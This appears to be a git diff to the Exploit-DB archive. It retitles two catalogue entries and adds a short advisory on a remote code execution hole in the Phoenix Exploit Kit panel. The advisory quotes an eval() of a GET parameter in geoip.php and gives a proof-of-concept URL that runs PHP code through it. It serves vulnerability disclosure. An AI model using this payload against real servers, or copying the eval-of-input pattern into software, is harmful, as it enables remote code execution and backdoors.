diff --git a/files.csv b/files.csv index ffaedf713..991d51ed8 100755 --- a/files.csv +++ b/files.csv @@ -895,7 +895,7 @@ id,file,description,date,author,platform,type,port 1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library <= 1.3.0 - Remote Command Execute Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0 1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0 -1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p - Pathname Validation Local Root Exploit (OpenBSD)",2005-07-04,RusH,bsd,local,0 +1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 - 1.6.8p (OpenBSD) - Pathname Validation Local Root Exploit",2005-07-04,RusH,bsd,local,0 1088,platforms/php/webapps/1088.pl,"Drupal <= 4.5.3 & <= 4.6.1 - Comments PHP Injection Exploit",2005-07-05,dab,php,webapps,0 1089,platforms/windows/remote/1089.c,"Mozilla FireFox <= 1.0.1 - Remote GIF Heap Overflow Exploit",2005-07-05,darkeagle,windows,remote,0 1090,platforms/windows/dos/1090.cpp,"TCP Chat (TCPX) 1.0 - Denial of Service Exploit",2005-07-06,basher13,windows,dos,0 @@ -17266,7 +17266,7 @@ id,file,description,date,author,platform,type,port 19911,platforms/solaris/local/19911.c,"Solaris 2.6/7.0/8 netpr Buffer Overflow Vulnerability (2)",1999-03-04,ADM,solaris,local,0 19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 /tmp Symlink Vulnerability",2000-05-10,foo,multiple,local,0 19913,platforms/cgi/remote/19913.txt,"George Burgyan CGI Counter 4.0.2/4.0.7 Input Validation Vulnerability",2000-05-15,"Howard M. Kash III",cgi,remote,0 -19914,platforms/windows/remote/19914.txt,"Seattle Lab Software Emurl 2.0 Email Account Access Vulnerability",2000-05-15,"Pierre Benoit",windows,remote,0 +19914,platforms/windows/remote/19914.txt,"Seattle Lab Software Emurl 2.0 - Email Account Access Vulnerability",2000-05-15,"Pierre Benoit",windows,remote,0 19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd SHELL Environmental Variable Vulnerability",2000-05-16,Sebastian,linux,local,0 19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability (1)",2000-05-16,"Hugo Breton",multiple,remote,0 19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0 @@ -36100,6 +36100,7 @@ id,file,description,date,author,platform,type,port 39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460 39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0 39909,platforms/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit",2016-06-10,hantwister,xml,webapps,0 +40047,platforms/php/webapps/40047.txt,"Phoenix Exploit Kit - Remote Code Execution",2016-07-01,CrashBandicot,php,webapps,80 39911,platforms/php/webapps/39911.html,"Mobiketa 1.0 - CSRF Add Admin Exploit",2016-06-10,"Murat Yilmazlar",php,webapps,80 39912,platforms/php/webapps/39912.html,"miniMySQLAdmin 1.1.3 - CSRF Execute SQL Query",2016-06-10,HaHwul,php,webapps,80 39913,platforms/php/webapps/39913.txt,"phpMyFAQ 2.9.0 - Stored XSS",2016-06-10,"Kacper Szurek",php,webapps,80 diff --git a/platforms/php/webapps/40047.txt b/platforms/php/webapps/40047.txt new file mode 100755 index 000000000..1cdf305f8 --- /dev/null +++ b/platforms/php/webapps/40047.txt @@ -0,0 +1,14 @@ +# Exploit Title: Phoenix Exploit Kit - Remote Code Execution +# Exploit Author: CrashBandicot @DosPerl +# Date: 2016-06-30 +# Tested on: MSWin32 + +# Vuln file : geoip.php + +492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop'); + +# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo(); + +# Screen : http://i.imgur.com/E7RBBRk.png + +__END__ \ No newline at end of file